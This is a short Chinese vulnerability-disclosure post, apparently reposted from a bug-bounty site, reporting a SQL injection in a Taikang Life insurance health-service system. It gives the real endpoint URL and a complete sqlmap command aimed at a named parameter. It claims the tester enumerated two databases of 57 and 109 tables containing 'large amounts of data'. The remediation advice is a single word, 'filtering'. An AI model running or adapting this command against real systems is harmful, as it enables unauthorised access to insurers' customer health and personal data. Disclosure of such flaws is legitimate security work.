首页 » 漏洞 » 泰康人寿某系统存在sql注射漏洞(支持union)

泰康人寿某系统存在sql注射漏洞(支持union)

 

保健通服务系统

系统地址:http://www.health.taikang.com/sbt/indexlis.jsp

泰康人寿某系统存在sql注射漏洞(支持union)

code 区域
python SQLMap/SQLMap.py -u "http://www.health.taikang.com/sbt/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db

泰康人寿某系统存在sql注射漏洞(支持union)

泰康人寿某系统存在sql注射漏洞(支持union)

漏洞证明:

泰康人寿某系统存在sql注射漏洞(支持union)

LIS库57张表

泰康人寿某系统存在sql注射漏洞(支持union)

SBT库109张表

泰康人寿某系统存在sql注射漏洞(支持union)

大量数据

泰康人寿某系统存在sql注射漏洞(支持union)

修复方案:

过滤

原文链接:泰康人寿某系统存在sql注射漏洞(支持union),转载请注明来源!

0